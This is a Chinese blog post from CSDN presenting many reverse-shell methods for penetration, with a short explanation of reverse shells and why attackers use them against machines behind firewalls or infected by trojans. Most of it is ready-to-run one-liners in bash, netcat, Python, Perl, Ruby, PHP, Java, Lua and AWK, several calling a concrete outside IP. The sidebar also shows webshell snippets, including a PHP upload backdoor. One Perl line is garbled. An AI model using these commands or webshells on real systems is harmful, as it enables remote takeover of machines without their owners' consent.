渗透-N种反弹shell方法

最新推荐文章于 2024-03-03 17:38:41 发布
最新推荐文章于 2024-03-03 17:38:41 发布
阅读量583 收藏
点赞数 4
文章标签: linux 运维 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_60941504/article/details/121563063
版权

一、什么是反弹shell?

反弹shell (reverse shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。

reverse shell 与telnet, ssh 等标准 shell 对应,本质上是网络概念的客户端与服务端的角色反转。

二、为什么要反弹shell?

为什么要反弹shell? 
通常用于被控端因防火墙受限、权限不足、端口被占用等情形。
举例:假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向连接。远程桌面、web服务、ssh、telnet 等等都是正向连接。那么什么情况下正向连接不能用了呢? 
有如下情况:

有如下情况:

  • 某客户机中了你的网马,但是它在局域网内,你直接连接不了。
  • 目标机器的ip动态改变,你不能持续控制。
  • 由于防火墙等限制,对方机器只能发送请求,不能接收请求。
  • 对于病毒,木马,受害者什么时候能中招,对方的网络环境是什么样的,什么时候开关机等情况都是未知的,所以建立一个服务端让恶意程序主动连接,才是上策。
  • 那么反弹就很好理解了,攻击者指定服务端,受害者主机主动连接攻击者的服务端程序,就叫反弹连接。

三、bash

在攻击主机上执行端口监听:     //port 为攻击主机端口号,并且此端口号没有被占用

nc -lvvp 1000

在目标主机上执行:

bash -i >& /dev/tcp/攻击主机ip/port 0>&1                            //port 为攻击主机端口号

 四、nc(netcat)反弹

在攻击主机上执行端口监听:

nc -lvvp port                             //port 为攻击主机端口号,并且此端口号没有被占用

 

在目标主机上执行:

nc -e /bin/bash 攻击主机ip port

五、常见脚本反弹 

以上脚本是在目标主机上执行,其中 x.x.x.x 均为攻击主机ip,并且需要提前在攻击主机上进行监听相关端口,接下来就不再赘述

1. python

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("x.x.x.x",5555));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'

2. perl

方法一:

perl -e 'use perl -e 'use Socket;$i="121.5.112.123";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

方法二:

perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"x.x.x.x:5555");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;

3. Ruby

ruby -rsocket -e 'exit if fork;c=TCPSocket.new("121.5.112.123","5555");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

4. PHP

php -r '$sock=fsockopen("121.5.112.123",5555);exec("/bin/bash -i <&3 >&3 2>&3");'

5. Java

public class Revs {
    /**
    * @param args
    * @throws Exception 
    */
    public static void main(String[] args) throws Exception {
        // TODO Auto-generated method stub
        Runtime r = Runtime.getRuntime();
        String cmd[]= {"/bin/bash","-c","exec 5<>/dev/tcp/x.x.x.x/5555;cat <&5 | while read line; do $line 2>&5 >&5; done"};
        Process p = r.exec(cmd);
        p.waitFor();
    }
}

6. Lua

lua -e "require('socket');require('os');t=socket.tcp();t:connect('121.5.112.123','5555');os.execute('/bin/sh -i <&3 >&3 2>&3');"

7. AWK 反弹

攻击的机器监听,在收到shell的时候不可以输入enter,不然会断开

awk 'BEGIN{s="/inet/tcp/0/121.5.112.123/6666";for(;s|&getline c;close(c))while(c|getline)print|&s;close(s)}'

小张在呢
关注
  • 4
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
一句话木马
飞鱼计划
09-06 2万+
一句话木马就是只需要一行代码的木马,短短一行代码,就能做到和大马相当的功能。为了绕过waf的检测,一句话木马出现了无数中变形,但本质是不变的:木马的函数执行了我们发送的命令。 我们如何发送命令,发送的命令如何执行? 我们可以通过GET 、POST 、COOKIE这三方式向一个网站提交数据,一句话木马用$_GET[' ']、$_POST[' ']、$_COOKIE[' '] 接收我们...
一句话木马,(小马)
weixin_42478365的博客
02-20 267
<web渗透-一句话小马>
weixin_45540964的博客
11-25 211
<!-------------------------- 一句话木马,加入当任何页面中 url 添加?hacker=2b 可上传文件 ----------------------------> <?php if($_GET["hackers"]=="2b"){if ($_SERVER['REQUEST_METHOD'] == 'POST') { echo "url:".$_FILES["upfile"]["name"];if(!file_exists($_FILES["upfile"]
asp 一句话小马_一个ASP小马
weixin_39681058的博客
12-29 381
a=Request.TotalBytes:if a Then b="adodb.stream":Set c=Createobject(b):c.Type=1:c.Open:c.Write Request.BinaryRead(a):c.Position=0:d=c.Read:e=chrB(13)&chrB(10):f=Instrb(d,e):g=Instrb(f+1,d,e):set h=...
linux 渗透 反弹shell,【技术分享】Linux渗透反弹Shell命令解析
weixin_26814683的博客
05-13 249
前言当我们在渗透Linux主机时,反弹一个交互的shell是非常有必要的。在搜索引擎上搜索关键字“Linux 反弹shell”,会出现一大堆相关文章,但是其内容不但雷同,而且都仅仅是告诉我们执行这个命令就可以反弹shell了,却没有一篇文章介绍这些命令究竟是如何实现反弹shell的。既然大牛们懒得科普,那我就只好自己动手了。本文就来探讨一下相关命令实现的原理。Bash这篇文章的起因就是网上给的Ba...
91-91.渗透测试-通过木马反弹shellLinux).mp4
05-10
91-91.渗透测试-通过木马反弹shellLinux).mp4
内网渗透-反弹shell.pdf
10-28
这是一份学习笔记,各个文章的摘抄整合。比较全面的反弹shell方法
89-89.渗透测试-通过木马反弹shell(Android).mp4
05-10
89-89.渗透测试-通过木马反弹shell(Android).mp4
CVE-2018-3191 反弹shell
最新发布
05-18
在信息安全领域,"反弹Shell"是一常见的攻击手段,常被黑客用于远程控制受感染的系统。CVE-2018-3191是针对这一技术的一个具体安全漏洞实例。这个漏洞可能影响到各软件或系统,尤其是那些具有网络服务功能的应用...
XXL-JOB反弹shell利用工具(xxl-jobExploitGUI)
11-03
工具实现了XXL-JOB默认accessToken权限绕过漏洞的单个检测、批量检测、一键反弹shell功能,后续会持续更新优化,添加POC检测等。(由于传播、利用此资源所提供的信息或者工具而造成的任何直接或者间接的后果及损失,...
Linux下NC反弹shell命令(推荐)
09-15
主要介绍了Linux下NC反弹shell命令,非常不错,具有参考借鉴价值,需要的的朋友参考下吧
web上传小马
10-07
构造上传页面,可以上传webshell大马进一步得到网站权限ASP
利用sqlmap和蚁剑进行简单的渗透测试和挂小马操作
dbabs的博客
01-24 606
利用sqlmap进行文件上传和简单的渗透测试
jsp一句话小马
weixin_42786460的博客
09-09 1008
jsp一句话小马
内网渗透-常用反弹shell方法总结
lza20001103的博客
08-28 4663
常用反弹shell方法总结 文章目录常用反弹shell方法总结前言bash反弹shellnc反弹shell1.nc弹linuxshell: nc -e /bin/bash 1.1.1.1 99992. 如果linux中nc没有-e参数3.nc 弹windows下的shell:whois 反弹shell常见脚本反弹1.python2.phppowercat反弹shellmsf反弹shell 前言 bash反弹shell bash -i >&/dev/tcp/1.1.1.1/9999 0&gt
渗透测试中用到的一些基本知识
song_jiazhibo的博客
10-12 851
渗透测试中用到的一些基本知识 1、菜刀连接一句话木马 <?php @eval($_REQUEST[cmd]);?> ?cmd=phpinfo; //查看php信息 //eval()函数把字符串按照PHP代码来执行,cmd为一句话木马的密码(菜刀连接的密码) //不加@会报错,但依旧可以执行命令,查看到信息 cmd命令制作图片木马:copy yjh.jpg/b + yjh.php/a yjh1.jpg 2、利用XSS实现CSRF: 构造钓鱼页面,利用存储型XSS漏洞重定向到钓鱼页面,当存
渗透测试[文件上传篇]
npc88888的博客
03-03 1261
在不同的中间件中有特殊的情况,如果在 apache 可以开启 application/x-httpd-php 在 AddType application/x-httpd-php .php .phtml .php3 后缀名为 phtml 、php3 均被解析成 php 有的 apache 版本默认就会开启。把恶意文件改成 js 允许上传的文件后缀,如 jpg、gif、png 等,再通过抓包 工具抓取 post 的数据包,把后缀名改成可执行的脚本后缀如 php 、asp、jsp、 net 等。
渗透不会反弹shell?来教你写一个cmdshell
蚁景网安学院
02-20 354
渗透不会反弹shell?来教你写一个cmdshell包含的库:#include <winsock2.h> #include <windows.h> #inclu...
cve-2021-44228反弹shell不成功
09-19
要成功执行反弹shell攻击,攻击者通常会选择将恶意命令嵌入到受攻击服务器的Log4j配置文件中。恶意命令将在服务器上被执行,从而使攻击者可以与远程恶意控制服务器建立连接,并进一步执行指令。 然而,由于几个因素...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值